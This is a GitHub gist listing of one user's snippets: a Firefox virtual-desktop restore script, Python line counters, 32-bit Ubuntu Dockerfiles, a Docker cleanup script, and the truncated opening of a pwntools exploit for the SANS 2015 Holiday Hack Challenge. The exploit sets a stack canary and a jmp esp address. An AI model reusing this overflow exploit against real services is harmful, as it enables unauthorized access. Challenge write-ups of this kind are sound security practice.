Skip to content

Instantly share code, notes, and snippets.

@fragmede
fragmede / restart-ff.sh
Created May 11, 2013 18:33
FVDWLR - Firefox Virtual Desktop Window Location Restore-er Simple shell script to restore firefox window locations to their previous virtual desktop location.
#!/bin/bash
# FVDWLR - Firefox Virtual Desktop Window Location Restore-er
#
#When Firefox restarts (crash/whatever), when the previous browsing session is restored, the virtual desktop that the window was running on is not also restored. If you're like me, and categorize browsing by windows and virtual desktops this is very annoying. (ie I have a Firefox window researching matlab on the same desktop that matlab is running on, and then on a different desktop I have Gmail/barnowl/irssi running.) This failure to restore desktops is thus quite annoying.
#
#This simple shell script fixes that by restarting Firefox within the shell script. It uses xprop and wmctrl to read and restore the virtual desktop location of windows after (forcibly) restarting Firefox.
#Note that I'm on Debian and so 'Firefox' is technically Iceweasel, so change the variable as needed
#Requires x11-utils and wmctrl packages:
# sudo apt-get install x11-utils wmctrl
#
@fragmede
fragmede / gist:8782876
Created February 3, 2014 12:16
count used c files
#!/usr/bin/env python
import os
headers = 0
c_asm = 0
mf = 0
mod_c = 0
dir_hash = {}
def countlines(filename):
#!/usr/bin/env python
import os
import sys
while True:
try:
filename = raw_input()
except EOFError:
sys.exit(0)
try:
FROM ubuntu:15.04
MAINTAINER samson_gh@onepatchdown.net
# Hello,
# My goal for this was to build overlayfs for 3.10.82 so that overlayroot can
# be used for an Odroid with Ubuntu to have a read-only root. Unfortunately I
# ran out of time. This Dockerfile creates an overlayfs.ko that fails to load
# because the kernel also needs to be updated.
#
# You'll need to actually read this Dockerfile before being able to run it
@fragmede
fragmede / Dockerfile
Last active January 9, 2016 19:24
32-bit Wily Dockerfile
# This Dockerfile originally from https://github.com/tianon/docker-brew-ubuntu-core/blob/d7f2045ad9b08962d9728f6d9910fa252282b85f/wily/Dockerfile
FROM scratch
ADD ubuntu-wily-core-cloudimg-i386-root.tar.gz /
# Download from https://partner-images.canonical.com/core/wily/current/ubuntu-wily-core-cloudimg-i386-root.tar.gz /
# a few minor docker-specific tweaks
# see https://github.com/docker/docker/blob/master/contrib/mkimage/debootstrap
RUN echo '#!/bin/bash' > /usr/sbin/policy-rc.d \
&& echo 'exit 101' >> /usr/sbin/policy-rc.d \
&& chmod +x /usr/sbin/policy-rc.d \
@fragmede
fragmede / Dockerfile
Last active April 13, 2017 03:51
32-bit Trusty Dockerfile
FROM scratch
# Download from https://partner-images.canonical.com/core/trusty/current/ubuntu-trusty-core-cloudimg-i386-root.tar.gz
ADD ubuntu-trusty-core-cloudimg-i386-root.tar.gz /
# a few minor docker-specific tweaks
# see https://github.com/docker/docker/blob/master/contrib/mkimage/debootstrap
RUN echo '#!/bin/sh' > /usr/sbin/policy-rc.d \
&& echo 'exit 101' >> /usr/sbin/policy-rc.d \
&& chmod +x /usr/sbin/policy-rc.d \
\
@fragmede
fragmede / Dockerfile
Last active January 9, 2016 19:25
32-bit Precise Dockerfile
FROM scratch
# Download from https://partner-images.canonical.com/core/precise/current/ubuntu-precise-core-cloudimg-i386-root.tar.gz
ADD ubuntu-precise-core-cloudimg-i386-root.tar.gz /
# a few minor docker-specific tweaks
# see https://github.com/docker/docker/blob/master/contrib/mkimage/debootstrap
RUN echo '#!/bin/sh' > /usr/sbin/policy-rc.d \
&& echo 'exit 101' >> /usr/sbin/policy-rc.d \
&& chmod +x /usr/sbin/policy-rc.d \
\
@fragmede
fragmede / Dockerfile
Last active January 9, 2016 19:24
32-bit Vivid Dockerfile
FROM scratch
# Download from https://partner-images.canonical.com/core/vivid/current/ubuntu-vivid-core-cloudimg-i386-root.tar.gz
ADD ubuntu-vivid-core-cloudimg-i386-root.tar.gz /
# a few minor docker-specific tweaks
# see https://github.com/docker/docker/blob/master/contrib/mkimage/debootstrap
RUN echo '#!/bin/sh' > /usr/sbin/policy-rc.d \
&& echo 'exit 101' >> /usr/sbin/policy-rc.d \
&& chmod +x /usr/sbin/policy-rc.d \
\
@fragmede
fragmede / docker-cleanup.sh
Created January 13, 2016 04:02
my script to cleanup stale docker images.
#!/bin/bash
df -h /
docker rm $(docker ps -a -q)
# add -a to 'docker images' for nested but those usually fail.
docker rmi $(docker images | grep "^<none>" | awk '{print $3}' )
df -h /
@fragmede
fragmede / get-shell.py
Last active January 14, 2016 05:48
exploit for SG5 for SANS 2015 Holiday Hack Challenge
from pwn import *
canary = p32(0xe4ffffe4)
jmpesp = p32(0x0804936b)
command = 'whoami; ls; pwd;'
r = remote('localhost', 4242)
r.recv()
r.sendline('X')